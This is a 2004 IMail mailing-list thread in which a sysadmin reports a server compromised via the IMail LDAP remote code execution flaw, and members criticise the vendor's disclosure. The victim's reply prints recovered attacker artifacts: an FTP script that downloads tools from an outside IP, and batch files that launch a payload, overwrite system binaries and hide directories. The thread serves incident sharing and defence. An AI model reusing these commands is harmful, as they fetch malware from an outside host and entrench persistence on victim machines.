It wasn't easy : )

There were many clues - the first was my hosting company alerting me to the
fact there had been "too much activity" on port 389 during the change over.
I thought this was simply the "denial of service" attack, so I made sure
that I was patched and didn't think much more about it.

Next some of the hidden files and logs that I found on the compromised
machine were scanning for port 389 and logging IMAIL servers that responded.
Also scanning out on 220 to 21 for DAMEWARE I believe.  I found this in one
file that allowed him to get files that he needed on my machine: (altered
files with and "_" to get through filters)


open 164.47.170.67 153
get
exe
get regsvc32.e_xe
get regsvr32.d_ll
get explorer.e_xe
get sux.d_ll
get sux.i_ni
get jacheck.d_ll
get jacheck.i_ni
get ircu.d_ll
get nsiislog.d_ll
get e.b_at
get crtdll.d_ll
get matze.e_xe
get scan.e_xe
get hidden.e_xe
get spoolsvc.e_xe
get regsv.e_xe
get go.b_at
quit

This was the contents of the e.b_at (batch file)

@echo off
cls
cmd.e_xe /c regsvc32.e_xe -s
cls
ping -n 20 127.0.0.1 >NUL
cls
cmd.e_xe /c regsvc32.e_xe
cls
exit

This in another file called secure.b_at (batch file)that was overwriting
system files and adding registry entries:

@echo off
cls
regedit /s c:\winnt\system32\c_md\root.r_eg
regedit /s c:\winnt\system32\c_md\config.r_eg
copy c:\winnt\system32\xcopy.e_xe c:\winnt\system32\cmd.e_xe
copy c:\winnt\system32\xcopy.e_xe c:\winnt\system32\ftp.e_xe
copy c:\winnt\system32\xcopy.e_xe c:\winnt\system32\tftp.e_xe
copy c:\winnt\system32\xcopy.e_xe C:\winnt\system32\dllcache\cmd.e_xe
copy c:\winnt\system32\xcopy.e_xe C:\winnt\system32\dllcache\tftp.e_xe
copy c:\winnt\system32\xcopy.e_xe C:\winnt\system32\dllcache\ftp.e_xe
attrib /S /D +H +R +S -A c:\winnt\system32\cmd
attrib /S /D +H +R +S -A c:\inetpub\scripts\scripttmp
c:\winnt\regedit.e_xe /s c:\winnt\system32\cmd\root.r_eg
c:\winnt\regedit.e_xe /s c:\winnt\system32\cmd\config.r_eg
exit

And it goes on like this....
-----Original Message-----
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Kevin Bilbee
Sent: Friday, May 07, 2004 12:46 PM
To: [EMAIL PROTECTED]
Subject: RE: [IMail Forum] DAMN LDAP EXPLOIT! Take it seriously


As a curiosity question, how did you determine that is was Imails LDAP that
was the entry point into your server???


Kevin Bilbee

> -----Original Message-----
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of Jay Sudowski -
> Handy Networks, LLC
> Sent: Friday, May 07, 2004 1:20 AM
> To: [EMAIL PROTECTED]
> Subject: RE: [IMail Forum] DAMN LDAP EXPLOIT! Take it seriously
>
>
> Of course you didn't know.  IPSwitch calls the vulnerability a denial of
> service attack, when it's in fact a remote code execution attack.  Any
> remote code execution attack, especially against a service running in
> the LocalSystem Context by default is going to be severe.
>
> In this day and age, it's down right negligent to be misinforming your
> customers about security vulnerabilities.  Yet, IPSwitch has no problem
> calling this issue a "possible LDAP Denial of Service vulnerability",
> which is just a flat out lie.  It's a remote code execution
> vulnerability with exploits in the wild.
>
> Ughs ...
>
> Jay Sudowski
>
> Director of Technical Operations
> -----------------------------------------
> HANDY NETWORKS, LLC
> Tel.: 1-877-70-HANDY Ext. 882
> Fax: 1-888-800-2FAX
> http://www.HandyNetworks.com
> ICQ 15601511  |  AIM JaySuds
> ----------------------------------------
> Specializing in Windows 2000 Hosting Solutions
> Bulk Reseller Hosting / Managed Dedicated Services
> Managed Dedicated Server Specials from $299
>
>
>
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
> Sent: Friday, May 07, 2004 12:42 AM
> To: [EMAIL PROTECTED]
> Subject: [IMail Forum] DAMN LDAP EXPLOIT! Take it seriously
>
> I had to move a box that is hosted for me offsite.  I was on 7.15 so
> installed it on the new box, then moved over my old IMAIL to the new
> box.
> Upgraded to 8.05 installed, Declude, anti-virus and so on and then
> applied
> HF3....
> I have been so badly hacked through the LDAP exploit that I have to move
> to
> a new box.  He also used my box to scan and compromise other IMAIL
> servers,
> I have IPS of possible other hacked IMAIL machines (I'm tempted to post
> them, but I will try to spend some time when I have it trying to figure
> out
> if I can contact these people - unless people feel I should post them) .
> I
> have spent over three days pouring through my box, pulling out installed
> programs, batch files, registry entries and still this guy is running an
> FTP
> service on port 4022 that I can't find the program, service or files
> that
> are being uploaded and downloaded.  The only thing that alerted me to
> this
> was the IPNT.NET tech calling me telling me about traffic spikes on my
> box
> at 2am.
>
> Virus scans found nothing, spyware scans found nothing.  If doing a new
> install of anything below 8.1 I STRONGLY suggest that you stop the LDAP
> service immediately and PATCH!!!  I had no idea that this exploit was so
> bad.
>
>
> ---
> [This E-mail scanned for viruses by Declude Virus]
>
>
> To Unsubscribe: http://www.ipswitch.com/support/mailing-lists.html
> List Archive:
> http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
> Knowledge Base/FAQ: http://www.ipswitch.com/support/IMail/
>
>
>
> To Unsubscribe: http://www.ipswitch.com/support/mailing-lists.html
> List Archive: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
> Knowledge Base/FAQ: http://www.ipswitch.com/support/IMail/
>


To Unsubscribe: http://www.ipswitch.com/support/mailing-lists.html
List Archive: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://www.ipswitch.com/support/IMail/
---
[This E-mail scanned for viruses by Declude Virus]


---
[This E-mail scanned for viruses by Declude Virus]


To Unsubscribe: http://www.ipswitch.com/support/mailing-lists.html
List Archive: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://www.ipswitch.com/support/IMail/

Reply via email to